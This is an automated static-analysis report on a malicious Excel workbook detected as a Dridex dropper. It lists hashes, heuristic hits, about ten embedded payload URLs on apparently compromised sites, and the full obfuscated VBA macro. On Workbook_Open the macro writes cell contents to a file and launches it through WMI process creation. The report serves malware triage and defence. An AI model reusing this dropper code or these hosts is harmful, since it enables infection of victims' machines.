Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 640749197d3b774f…

MALICIOUS

Office (OOXML)

265.6 KB Created: 2021-03-03 13:24:54 UTC Authoring application: Microsoft Excel 15.0300 First seen: 2022-07-02
MD5: 4adf3e27ce8d178ad0b1eccdf20ff9a9 SHA-1: 619fed5e7a275de69a5c53ad2a8b26e8dcf30430 SHA-256: 640749197d3b774fbed9033eb95e905db9e422fe021967e31de553f31f441d71
240 Risk Score

Heuristics 8

  • ClamAV: Doc.Dropper.Dridex-9845759-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Dridex-9845759-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    With GetObject(x9MsV_bcy)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Private Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    JSfpVbRb = Environ(r3uKVTv)
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://crm.sgdatapos.com/modules/goals/language/bulgarian/xo4dOLHR2TYyME.php In document text (OOXML body / shared strings)
    • https://zekadrift.rs/wp-content/uploads/2019/03/Ntq0ySMQwMQ2ky.phpIn document text (OOXML body / shared strings)
    • https://desertkingresort.com/wp-includes/js/mediaelement/renderers/EuvU0zd7SW6E9pB.phpIn document text (OOXML body / shared strings)
    • https://stylezinn.com/wp-content/uploads/2019/07/NcvzIUCMoElMsqj.phpIn document text (OOXML body / shared strings)
    • https://jettyplus.com/wp-includes/sodium_compat/namespaced/Core/KKkuowqCH3GeoL.phpIn document text (OOXML body / shared strings)
    • https://century21.empov.ct5kh.com/img/back-img/jVc6HWYRU1kkzNT.phpIn document text (OOXML body / shared strings)
    • https://bestwestjeans.cl/wp-content/plugins/woocommerce-transbank/css/C0B3LpaJ.phpIn document text (OOXML body / shared strings)
    • https://hopefamilytrusts.org/wp-includes/SimplePie/Content/Type/AVa3B5ouSUX.phpIn document text (OOXML body / shared strings)
    • https://test.wonderlandchile.cl/wp-includes/SimplePie/Content/Type/nF6ZdeMgj7s.phpIn document text (OOXML body / shared strings)
    • https://vertcompany.com.br/wp-content/cache/wpo-minify/1613141973/QwlvahpVhQ.phpIn document text (OOXML body / shared strings)
    • http://www.w3.org/1999/XSL/TransformIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 15567 bytes
SHA-256: 72ba5b06420ccc93acbe906a13ca1f0c724395d4ab3dcbb8ad51f1f7a3848dc9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
268 of 476 identifiers look randomly generated (e.g. 'xlCylinderBarStacked100') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Workbook_Open()
BoZ6zR75e = Array("WIsME_8jcx_fl5_G88y VcJuM580M" & CZ37Xrjr & "Ltzp_CqmY_4MNb_Snd J880p31Lc7p9YK ItI0ZiEYGX6jIU", "Kzm8E_u8Bc_P3C JYVW_U0j_K3R5" & O0IwXxvg & "Dia4e52kj3Z")
Mq0F_JHDF_hiM = mg1J_jnM_iBy.m7xMf_t2SK
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "mg1J_jnM_iBy"
Function tCK5H5tWcvNL(UyT9q_lXVO_Cse_PgVe)
tCK5H5tWcvNL = Chr(CLng((124 And xlDialogWorkspace))) _
 
AOKtb_wR7_jzA_5Fo = Len(Join(Array("LiOx8H7VVaBTWVYmG c2CoXYEBbE xwxs_iH7_BFbU", TOCK_9kW_vZwU & etYt_Zo8 - XOrcul1AD, "kAme_ZtBU XlhxPob GrlOi_e181_CfOI_lVQ" & Ozb9lrqflC0SG)))
End Function
Function m7xMf_t2SK()


Dim oJhjIuOQn5 As String
oJhjIuOQn5 = HfpN_m0wz_0ige.IV8f2aVwqgP6lFv.Text
IP8CW_qYA_fSi = wBhq3_Rz1q_FOBu & AU7NOMHxz5JKOP.JSfpVbRb(PkOyH_sI0.rVe7r680zJ(QMk0nFvvsSXU7XGBm)) & I7lMpwy0bBCW0D & mg1J_jnM_iBy.tCK5H5tWcvNL(T1xCv5hyBfg9) & I0D89n2jiX0A & OhWVuZJpI6 & EQpDl_gBwx_t53t_e5sb & AUxbB_N5Q_pY6_Rj1 & mg1J_jnM_iBy.YBBDe_a1c_3Zi_0LE(lV0vS_AnD) & IjPN_vFdh & E0iM_xiQS_V8Q_tdM & AU7NOMHxz5JKOP.hJhxtYDMkvRA
Open IP8CW_qYA_fSi For Binary As #CLng((xlAbsolute And xlRangeAutoFormatClassic1))
QtcXI9ks = Len(Join(Array("Tijow7YWJh0z0QzET" + "gIfgL_men_Yuy" & vZLHNHkyS7tEzaJ, Vs6bWhgEyb - SrZ38yL, "I4KpV_aKU7_YCZ_VMn GV5DC_Fjh_3fz", "FkzMGoPQdl6ir KcoGK_gcF vtU0_tYkf_Ryk_L4qq" + "GWbdmYykEOcLU", YpD04_O8v_upf, GVcx99aO2C * KvnmcgQgDoE4vO40)))
Put #CLng((xlAtTop Or xlFormatFromLeftOrAbove)), , oJhjIuOQn5
Close #CLng((xlOn And xlSortValues))
Eheb_JYu_0kQ = FTi4M_5WSF_4gK(EXvahxH84.O11iJl64M, rxGv_fL7.N23H_7APd_BHrb & IP8CW_qYA_fSi & Chr(34), HfpN_m0wz_0ige.OFBu5xPuvuvBzE8u(IbaXch8GV.U99fkYpCd9C))
vrLz5_Lht = Replace(V9RxZCFwRArbEai, M7DB4_9W4, Cpe0HNNs42)
End Function
Function FTi4M_5WSF_4gK(x9MsV_bcy, iCH0ihMFOn4OU, lWYsMR2glX)
Debug.Print HsX7v_x98_dYq9_nje
ANUI_30Cc = Len(Join(Array(PIAjLbhT3ixm, "XNOt_0u6K_XPk6 KZz9_P4j_azUO_xaRM OVDrMhJ0R9RQRTZf" + "cnpLZ_Csv_Qu1o WhhfqLW2WXCrj0V" & "DXtBiCO EfAHOBFG2sjk6oA", xiG60PEJ & uJyQ_0AYf_WqhN_klb, "G67v_lSa_G0h_gcL P5whPEOc fg8x_ezUU_Biu_M7e", "b3P7o_XqM_vdcf_NCwj" + "JBuG8_ZEWt_ZbXY_T3ie VdjYU_a2e Riqz_Ruf", E2KE9139 & "qEajYjJvT0Z5 Sa8zu_MZV_Y1A1_glrU SRmFwSlWLwvQ0NL")))
mUPrujqD2 = Abs(CLng((-1279 + (xlDialogWorkbookUnhide + (1.43969849246231 * -398)))))
O0demCh28nJa0 = Abs(CLng((367 Xor (777 + (642 - 742#)))))
UdOv_ZN7 = InStr(JS3am_6GI, AO5DCrkgz3eq5, X9Sk4_wxX_tnJ)
BVZJb3jFo = Year(ZA9g_3X5)
With GetObject(x9MsV_bcy)
RzosRcBNpCFTSjgj5 = Join(Array("AIEBI_hwN_PQtu tj48_azH_RlL TPUeW_Fsda", "JdWy_9hg_gWd_Hojp", ef7wqXqVJlb & PJNUgvgxioP & NWYE4xNK6g))
.Create iCH0ihMFOn4OU, Null, lWYsMR2glX
End With
'MJ7xKSPT0 PAlfYPrYTB7Q dSi1qODq Yvsrc1LCYHGzq1dFo Cs8nkmMm PAw1_x4qi haF3YCEBt
BetqZQE4 = Array(DIO2NqygxBvMSjf, Agpw_a7lK_Dvh_Vc9p)
F0cLY_n2i_55BZ_Udy = Year(TP0ywi6O4s7)
LZoQF4w0 = Weekday(DeyLzQTmmkTIpFav)
End Function
Function YBBDe_a1c_3Zi_0LE(eA1sbT7AGsX)
TTOtBqGRL2v = Len(Join(Array("VId1mkaW7assozYj xXCsayQGPyAYg8vS MIK8D_wEk_sQG_WAL" + "B90jWSZxFTnjV0u1" & "Xaxg4_MVv_tfB_KyK", BzlXCCe0u + zXjo0_6GEa_MGCi * Zh2s_kcdk_0gjr, "VuUY_vpy_Cdtq_0Tme sm4bEJFrabB MrRzHgQFn9rKdah", LJXLcp1Y603i1 & "IxH0A_0Th xk103nKl phOQA_pNP_7Cpe_Yt0P", AC69n_eTTJ_HQC7_XztQ & "yDybaZDfxJS")))
XwIS_tc3_VHo = Replace(sYJ1c_7fT_txLF, RumN9XZP9cyj, IFSoJZ61aHlKu)
dKax_VPF_PIF = Join(Array(gayV_A3p_ieA_zLFr))
Debug.Print X2xQ_VH85
'gLHGgboAy qgTs_J3Ng Z7JbrZMJXNO631 BsFyw_oAK0_cKj RsUh_2pf_ovE KMwswBd7xg5u3mR TpLMNs85b Oi9C_Pj8 BoMW_6TpE
YBBDe_a1c_3Zi_0LE = Hex(CLng((CLng((1.23822605965463 * 2548)) - CLng(((xlStockOHLC - 68#) Or xlCSVMSDOS)) + CLng(((4.70016207455429E-02 * 617) And (xlDialogWebOptionsFiles + -653#)))) * Rnd + CLng((4.20289855072464E-02 * 690))))
YjUEUuc = InStr(ScaZ_d30_0JY_OmZ, fwzRCm2, R7gPYyfB8)
mxJfb_jFEA = Replace(AJryrMjOuClBCcEe, XmcS9zpr, PD7DmllQoRIA)
FXfbWW5bpICZ = Array("ph1r2bU8iwdB4bC r0lSL0Qbd ZXiztTE" + "ylb2_Md2w_SYl_GdvQ ShTnE0FA6fEiICA" + "PC0lPlM SYlrBMdpWt7M75r", cDrC_jrLX - Kbb1x_7S3, "rpMWfiyQ" & FMPYncyDkvoY1t)
wAt8xFwA = Array(J5xWLpa1wVjc)
J5cWC_SeS6_3x7_4v4 = InStr(FbWAas9kGoL, I0pNeritDWINueOD, XH04c_26G_LkM_oss)
For J57Sqs5 = 0 To CLng((1910 And 1327))
FPvv_Bzt0_04p = J57Sqs5
Next J57Sqs5
End Function
Function oFyMuLcKiU(MyeftrMu0KD)
oFyMuLcKiU = ChrW(CLng((Not (-50 + 15#)))) _
 
End Function


Attribute VB_Name = "PkOyH_sI0"
Attribute VB_Base = "0{7D17EB91-BCBF-4F05-8CDE-28E46EE34111}{90C6F69F-6E06-477E-A006-03052142457B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function rVe7r680zJ(jTcpUgtES)
rVe7r680zJ = Join(Array(ChrW(CLng((Asc("a")))) + Chr(CLng(((xlDialogScenarioCells + -305.235789473684) * (-485 - -10#)))) _
 + ChrW(CLng((48 Xor (979 + -915#)))) + ChrW(CLng((AscW("d")))) _
 + ChrW(CLng(((0.643649815043157 * (2545 - 923#)) + -947))) + Chr(CLng((AscW("t")))) + Chr(CLng((Not -98)))))
GfPmW_4wl_fQ95_G3E = InStr(sJ7eZN1svH8, FCLz04Yvfaf, SfBF_1EmK_ksSb)
'jbqmg6P3nERme8Y T8Z19I4Z8c f6GC0H5vZtR R7ozRiW5 Utp2lmwg Mbdi_xVB_bBx
End Function


Attribute VB_Name = "AU7NOMHxz5JKOP"
Attribute VB_Base = "0{072A719A-D3BB-4C7A-99F1-A9B43C9CFD62}{A61DD593-2875-4A33-8C46-8169FBF5F88D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function JSfpVbRb(r3uKVTv)
'e0xwgYs0F2Y hecoY1e43fxlz CIg2_tKt1_GkIa_Tk0 NrKH6_sXb KcdR_XBc_WO8u_OOE YNxyAhQgNVY0
NZrb09rjVcbv1C = Replace(Rrr1_f9KC_ygp, Tq4jq_53Ej_p1nK_iDB, XnwAF_SWc_OhAZ)
Bkhbl6zcYl = Weekday(EcIk_p6Kt_T22_QH5P)
HGAr_pcO_9hH = Len(Join(Array(OamqD_Lkkd_DS0_dm8, h1frS5N7Q0x * JSU0Vb1rH + M90fQy5U, Bl4xS_oFF ^ GPCe_OuwT, "G73s_DUu FmFJYKODewt SVAX3qqFd9Lj4TS", zgey0kCFhi7K)))
Olz4S_bRU_kTbJ = Year(RdEEaOn0)
xZM46dYA = CLng((1946 And 3359)) > CLng((xlDialogWorkbookUnhide - xlDialogPhonetic))
JSfpVbRb = Environ(r3uKVTv)
kGnxH_Ne5h_m0CB_0oX = InStr(CeeI_pEP_oS2b, W3F03_mWL_qOQ_qmZZ, QhqAA_GvY)
RmJE_Nbzw_M3Uu = Replace(A373_wU1W, VkVjXfQZKDoQlBXe, S0ig_6h3_jpvQ)
'YdQTO_KeBi_2Qc P3ldQAS0dOv TR1y3TMfzE SFa0NyF1kTpC ck8D_83K_yHEH_sF9
OOef_s2wX_STlX_wio = Split(U4ADowL, ccNk43Et, fpx1u_S82_hiE)
ULEvJ37nJw4mhl0t = CLng(((610 + (310 - 532#)) Or 164)) < CLng((((xlDialogSubscribeTo - 217.303623490212) * 2401) Or 1849))
OdmK_5oUs_Ji03_kyv = Len(Join(Array(A3i3_kx4_nEam_bCYT * NLQF_Dxc_EDE & Qhwt_3y5_LhtV, XiChWXqvJkIU & "JeCqg63V3LMO7b EmQA_TetV_Orz_tYqZ vKKL_q6H" & JenjV7xFpNyYE7g, A8WqlMTr20JC & "JlpNE_c6F KreA15cJe6QpW" & dvBEKGvAhzAeDIr)))
PVkD_oJQ_TNi = Join(Array("VzT1_9vr_Hsh" & V1Ley2bme3n * SMwClGIqs9R, CecrRXSI - U5zi_p5yY_fMbe_0sG6, "NNWtX_DCP2_StKL QLxB_rbE JDkd1q5rEfOvQOP" + "ZoysL25yOlRC vWLN9AQ4fOFX0l"))
Id00e_hyv_GAY_J4s = Join(Array("I7Ey0_4v9_z0eK_JFL" & "MEWaIYVt8c26hQU wPFL_ro0Z" + "EsXoNGQZHw9216 HaZ2_HKxt_QoE_gBP", G50C_UCLF_TDA & "H4Macc7ZIk7r MXIQYUqaplwVm" & OUM3_7I9_HH8Q, "XAkOwZGmy56Q" & Vyt0j3KIAdvF9, "XihV4iRPpRdO UkoSK4fkQMh58N3 Mh1fm_W2l8" & VMH1_y60x_lfA, JaCVtmcC0yUaWG7, "O4Y34_DGN_DrnQ puU2_QLuW_fKd sVQvZM4y", Ux3d2_VA4 & "Qnik_4w8I Ipc0V9m" & "D004ynYq"))
JEku_YcYj_oOvi = CLng((444 Xor xlRangeAutoFormatClassicPivotTable)) > CLng((979 And 735))
H0hY_jA1p_5xWO_Q0D = Abs(CLng((-150 - -602)))
SToQN_Hko0_vO2r_APOy = Weekday(R4hfeQAkC7jmRT5)
wpq0I4JrRBy = Split(Vc1AWWGEjjvJM8, EGYdwtM, I92ujguhAZxc7)
i9rjz_ml8t = "441"
Idg54RaGnFM = Year(DOM93Zl5)
End Function
Function hJhxtYDMkvRA()
hJhxtYDMkvRA = Join(Array(Chr(CLng((xlXMLSpreadsheet And xlLineStacked))) + ChrW(CLng((AscW("x")))) _
 + Chr(CLng((672 - (2.85641025641026 * xlDialogGallery3dLine)))) + Chr(CLng(((-438 + 437.834862385321) * -654))) _
 ))
End Function


Attribute VB_Name = "rxGv_fL7"
Function N23H_7APd_BHrb()
N23H_7APd_BHrb = Join(Array(ChrW(CLng(((5.40241156388465E-04 * -312) * -706))) & ChrW(CLng((503 + -394))) & ChrW(CLng((-0.433884297520661 * -242))) _
 & Chr(CLng((xlCylinderBarStacked100 Or xlDialogGalleryArea))) _
 & ChrW(CLng((((-536 + 536.080160320641) * 499) And xlDialogInsert))) _
 & Chr(CLng((AscW("o")))) & Chr(CLng(((-133 + 352#) + (-1014 + 910#)))) _
 & ChrW(CLng((633 - ((-427 - -620#) - -408#)))) _
 & Chr(CLng((AscW("g")))) & ChrW(CLng(((0.174329501915709 * 522) Xor xl3DBarStacked100))) _
 & ChrW(CLng(((-334 - 516#) + (0.786004882017901 * 1229)))) & Chr(CLng((-796 - (-9.74117647058823 * (1024 + -939#))))) _
 & Chr(CLng((-2.35 * (865 - 885#)))) _
 & Chr(CLng((Asc("f")))) & Chr(CLng(((0.259953161592506 * (xlDialogEditSeries - -199#)) And xlDialogDeleteFormat))) _
 & Chr(CLng((118 And 123))) & Chr(CLng((-446 + (242 - -313#)))) & ChrW(CLng((Not (24.5 * (1.34228187919463E-02 * -298))))) & ChrW(CLng((AscW("t")))) & ChrW(CLng((0.117647058823529 * xlDialogCustomViews))) & Chr(CLng((-768 - (-672 + (-475 - -345#)))))))
For ss103HBBw = 0 To CLng(((1356 - 844#) Or 648))
Oi0MP_k1R5 = ss103HBBw
Next ss103HBBw
JlLYzZK7 = Array(ELLo7ZOCBte3EGGz & "FlAewLE FoeU9_X7H_QaGG_5jdY jRw2_z8B" & BexEjS1THw, "nO6h5ZVlgc4sFz9" & JMvWWT1lWTfYE, "mY3c_9CP vJ6NLFeX9 oCstN_Dc8_QBY_LIAC", "ms5wk8sTU nx2VDyKR0B1w", "Vmc6ld2V BElbbVhnfFU8F4eK")
End Function


Attribute VB_Name = "EXvahxH84"
Attribute VB_Base = "0{5DFC5BE4-662A-408B-BCB4-58EF6B3C1E8E}{3556C9EF-D9DE-49F8-9630-48706A110839}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function O11iJl64M()
O11iJl64M = Join(Array(Chr(CLng((-0.266219239373602 * -447))) & ChrW(CLng((Asc("i")))) & ChrW(CLng(((0.173972602739726 * 730) And (371 + -261#)))) _
 & ChrW(CLng((Asc("m")))) _
 & Chr(CLng(((785 + 289#) - 971))) & ChrW(CLng(((xlDialogChartTrend - (-108 + 457.75)) * xlDialogLabelProperties))) _
 & Chr(CLng((118 And (471 + -355#)))) _
 & ChrW(CLng((AscW("s")))) & ChrW(CLng((Not (0.178787878787879 * -330)))) & ChrW(CLng((551 + -437))) & Chr(CLng((((-1849 + 559#) - -442#) - -959))) & Chr(CLng((xlCurrencyLeadingZeros Or xlDialogDeleteFormat))) & Chr(CLng((Asc("t")))) & Chr(CLng((9.03732809430255E-02 * 1018))) & Chr(CLng((Asc("c")))) & Chr(CLng(((-177 + 741#) + -459))) & ChrW(CLng(((-87 - -876#) + -680))) & ChrW(CLng((-31 + 149))) & ChrW(CLng((-0.122549019607843 * -408))) & ChrW(CLng((AscW(":")))) _
 & Chr(CLng(((1533 - 679#) + (-12 - 755#)))) & Chr(CLng(((1.33755274261603 * xlDialogProperties) + -529))) & Chr(CLng((xlDialogDeleteName Or xlFormatFromLeftOrAbove))) & Chr(CLng((-795 - ((-709 - 521#) + 384#)))) & Chr(CLng((0.12853470437018 * 389))) _
 & ChrW(CLng((Not (0.09375 * (-1429 - -405#))))) _
 & ChrW(CLng((-564 + 644))) _
 & Chr(CLng((xlAlternateArraySeparator Or xlCylinderCol))) _
 & Chr(CLng((xlPieOfPie Xor (-6.92431561996779E-02 * (-244 - 377#))))) & ChrW(CLng(((-0.208421052631579 * -475) And xlDialogNew))) & ChrW(CLng(((316 - 633#) + 418))) & ChrW(CLng(((0.170876671619614 * 673) And (0.197115384615385 * 624)))) & ChrW(CLng(((-53 + 84#) - (9.10075839653304E-02 * -923))))))
End Function


Attribute VB_Name = "IbaXch8GV"
Attribute VB_Base = "0{811010D0-5DD9-48FE-8AF9-4DFBA053D7B3}{87AD64A7-5E3A-42A8-9813-728FB186389E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function U99fkYpCd9C()
U99fkYpCd9C = Join(Array(Chr(CLng((xlXYScatterLinesNoMarkers Xor xl3DBarClustered))) + Chr(CLng((((xlDialogGallery3dLine - 195.000345144961) * 820) * -371))) _
 + Chr(CLng((Not ((-290 - -504#) - 325#)))) + ChrW(CLng((xlTotalsCalculationMax Xor (0.545918367346939 * xlDialogGallery3dPie)))) _
 + Chr(CLng((Not (3.85185185185185 * (-224 - -197#))))) _
 + ChrW(CLng((xlRangeAutoFormatTable9 Or (-0.221978021978022 * -455)))) + Chr(CLng((-546 - (-1128 + (331 - -135#))))) + Chr(CLng((0.107778819119025 * 1067))) + Chr(CLng((Asc(":")))) + Chr(CLng(((-610 - -260#) + 442))) _
 + Chr(CLng((Asc("r")))) _
 + Chr(CLng((0.103159851301115 * 1076))) + Chr(CLng((xlDialogVbaProcedureDefinition - (-708 + 927#)))) + ChrW(CLng((Not -117))) + Chr(CLng(((10.5 * xlSendPublisher) Xor xlXYScatterSmoothNoMarkers))) + Chr(CLng((Not -100))) + Chr(CLng(((990 + -938#) Xor xlCylinderColStacked))) + ChrW(CLng((Asc("m")))) + Chr(CLng(((0.975265017667845 * 1132) - 986))) + ChrW(CLng(((-936 - -991#) Xor xlUnderlineStyleDoubleAccounting))) + Chr(CLng((AscW(":")))) _
 + ChrW(CLng(((-4.83168316831683 * -101) - 401))) _
 + Chr(CLng((Not -106))) + ChrW(CLng((AscW("n")))) + ChrW(CLng((48 Or xlExcel4Workbook))) + Chr(CLng((Asc(xlClassic2)))) _
 + Chr(CLng((xlCylinderBarClustered And xlDialogWorkspace))) + ChrW(CLng((Asc("P")))) + ChrW(CLng((-286 + (918 - 518#)))) _
 + Chr(CLng((AscW("o")))) _
 + Chr(CLng(((6.99893955461294E-03 * (602 + -479#)) * 115))) + ChrW(CLng((1.24691358024691 * xlRadarMarkers))) + ChrW(CLng((xlUnderlineStyleDoubleAccounting Xor ((0.365972222222222 * -1440) + 645#)))) + ChrW(CLng((-383 - -498))) + Chr(CLng((xlStockVOHLC And xlDialogNew))) + ChrW(CLng((Asc("t")))) + ChrW(CLng((121 And xlConeColClustered))) + ChrW(CLng((xlPCX Xor 120))) + ChrW(CLng((xlAutomaticUpdate Xor xlPyramidCol))) + ChrW(CLng((Asc("u")))) _
 + ChrW(CLng((-622 + 734)))))
End Function


Attribute VB_Name = "HfpN_m0wz_0ige"
Attribute VB_Base = "0{3ABD3A2F-3DC4-454A-8A0A-33CB4F3DEED9}{784AFC99-FBF7-47EA-BA45-64CD2C0ABFB6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function OFBu5xPuvuvBzE8u(qizby_euH)
Set OFBu5xPuvuvBzE8u = GetObject(qizby_euH).SpawnInstance_
ZVWx_5uHt_Yxi = Len(Join(Array()))
kKAkxzGRon = Array("tkNL_7KGa" + "wYHOvO1R K1OqypoNkvS8 S3N1_D0Dm_hMQ" + "P7RlSPXVzCd", "Hddu71scSGYttpH")
IOzV9Bw202ACz8Y = Array(XBtIzDpNpfn - Fo0ck_VrJ_Tie, "NV0g8_BIWE_1P7")
Debug.Print NZAZS_OEz_q4hH_tcjN
RFHUkqY4gSl = Len(Join(Array("ISgobchGFFJf8UwD JSY3pd5VsPBIOGb tRDhW5A" & "KqAX5_iMTj_d7H P4UuDboT5QD ElzrHAakc0AD" & S96fvu9h, "TcD5_IXZ" + "Ntmo8ourYdNO9", "VtJS_OjsB" + "Xqayp_y53h LpYWAW0f" & EsAFO_Z08_WMG_9e5Y, "FUlwetbCAy4YlLNj BBQz_zgWp_0FVz_xrQ KDlnA_nyDz_cCQ_9om" + "pdulMzk")))
OFBu5xPuvuvBzE8u.ShowWindow = CLng((562 - (972 + (239 - 661#))))
HziJE_jAIQ = Replace(eDhU_nlK_byVO, ERrER1LxJaokRF, P0gOH_tnV_5tR)
WLb7I_1F0_kh4 = "960"
Debug.Print RnW8H_OF0U_Th3
OZYD_0MkW_cM4_23j = Abs(CLng(((0.508296943231441 * 1145) Or xlDialogChartWizard)))
EQYM_iyO = CLng((((-429 - -908#) - 976#) + -84)) > CLng((-735 - -108))
l68FpyUWIXEpZ8tf = Join(Array(gmsQ_NES_X6L_o1Z, QRGb4B9GWMRL87Do & "sc4sJqCMwzWK6E" & OU0p_Zpm, "Vp5C_krq_u6X_0sh q9g1FrpAf4RjVO UC3JH_A8G" & P3wpB_Rop_77F & "Gql6osO XAXuYF4TFa", "YkYyzCLfAk70Ws MM50DqIrhOGT8Ga KY4JcQi" & KxBf_w1m_RIN & "kuMwvVoOb i7ICF_N15b_vU2_ngW8"))
End Function
vbaProject_00.bin vba-project OOXML VBA project: xl/vbaProject.bin 68608 bytes
SHA-256: 8d204f25a2a84758189a354e9b9bd59a11516e95abfa8d342910a388720cbb6c
Detection
ClamAV: Doc.Dropper.Dridex-9845759-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.